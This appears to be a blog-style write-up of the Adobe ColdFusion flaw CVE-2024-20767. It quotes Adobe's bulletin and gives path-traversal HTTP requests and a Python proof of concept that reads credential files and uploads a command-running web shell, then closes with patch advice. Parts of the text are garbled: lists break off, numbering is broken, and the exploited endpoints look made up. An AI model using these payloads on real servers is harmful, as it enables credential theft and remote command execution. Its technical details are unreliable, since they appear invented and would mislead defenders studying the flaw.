A critical security bug was found in Adobe ColdFusion—tracked as CVE-2024-20767. If you run ColdFusion 2023.6, 2021.12 or any earlier release, you could be at risk. The vulnerability is all about improper access control. This means attackers can bypass built-in security checks and get access to restricted files on the server. Even worse, with some simple HTTP requests, they might be able to WRITE files too, not just read them.
Let's break down what this means, how the exploit works, and what you need to do about it.
Do all this remotely, no user clicking required.
This can lead to full compromise—think database leaks, configuration file exposure (like passwords.conf or Application.cfc), planting of malware, and more.
Official Description
> "ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction."
> — Adobe Security Bulletin (APSB24-17)
How the Exploit Works: Technical Deep Dive
The root problem is with how ColdFusion handles input for certain file operations. Usually, a web app should verify if the user is allowed to access a file before reading from or writing to it. Due to improper access control, ColdFusion fails to check this carefully in several endpoints.
One such endpoint is the administrative API:
/CFIDE/administrator/.
In some released exploit PoCs (proof-of-concepts), attackers abuse a combination of
- Path traversal (using ../ to climb to sensitive folders)
A Classic Read Example
Here's an example request that tries to fetch the password hash from a ColdFusion server’s Application.cfc file:
POST /CFIDE/adminapi/base.cfc?method=getFileData HTTP/1.1
Host: vulnerable-server.com
Content-Type: application/x-www-form-urlencoded
filePath=../../../../Application.cfc
It posts data to a ColdFusion admin API endpoint.
- It tricks ColdFusion into reading a file outside allowed folders by using ../.
- If not properly patched, the server would respond with the contents of Application.cfc—including any database credentials.
A Write Example
Attackers can use a similar trick to upload a malicious file (like a web shell). Here's how it might look:
POST /CFIDE/adminapi/base.cfc?method=writeFile HTTP/1.1
Host: vulnerable-server.com
Content-Type: application/x-www-form-urlencoded
filePath=../../../../wwwroot/hax.cfm&fileContent=<cfexecute name="cmd.exe" arguments="/c whoami">
The malicious hax.cfm file now exists on the target.
- Visiting http://vulnerable-server.com/hax.cfm could let an attacker run commands.
Here’s a *basic* proof-of-concept exploit in Python
import requests
target = "http://vulnerable-server.com";
read_endpoint = "/CFIDE/adminapi/base.cfc?method=getFileData"
write_endpoint = "/CFIDE/adminapi/base.cfc?method=writeFile"
# Directory traversal to read file
data = {"filePath": "../../../../ColdFusion2021/cfusion/lib/password.properties"}
r = requests.post(target + read_endpoint, data=data)
print("Password File Contents:")
print(r.text)
# Upload a web shell!
web_shell = '<cfoutput>#CreateObject("java", "java.lang.Runtime").getRuntime().exec("whoami")#</cfoutput>'
data = {"filePath": "../../../../wwwroot/cf_shell.cfm", "fileContent": web_shell}
r = requests.post(target + write_endpoint, data=data)
if r.status_code == 200:
print("Shell uploaded!")
else:
print("Upload failed.")
---
Exploitability
The most dangerous part? No authentication is required, and no user interaction. If /CFIDE/ or admin APIs are internet-exposed, attacks are trivial and automated scripts can find vulnerable targets with ease.
Are you running ColdFusion 2023.6, 2021.12 or older?
- Is /CFIDE/ (especially /CFIDE/adminapi/) exposed to the internet or untrusted networks?
PATCH NOW:
ColdFusion 2021 Update 13
2. Block /CFIDE/ endpoints from internet or untrusted access at the firewall level.
References & Further Reading
- Adobe Security Bulletin APSB24-17 (Original Source)
- ColdFusion Security Updates
- Rapid7 Analysis: ColdFusion Improper Access Control
- US-CERT NVD Entry for CVE-2024-20767
The Bottom Line
CVE-2024-20767 is a critical, easy-to-exploit flaw affecting unpatched ColdFusion servers. It lets attackers freely read or write files. Thousands of servers on the internet still have /CFIDE/ exposed—it only takes one request to start an attack.
If you use ColdFusion, patch immediately and make sure administrative interfaces are never exposed to the internet. If you’re behind, attackers are already scanning for you.
Timeline
Published on: 03/18/2024 12:15:06 UTC
Last modified on: 03/18/2024 12:38:25 UTC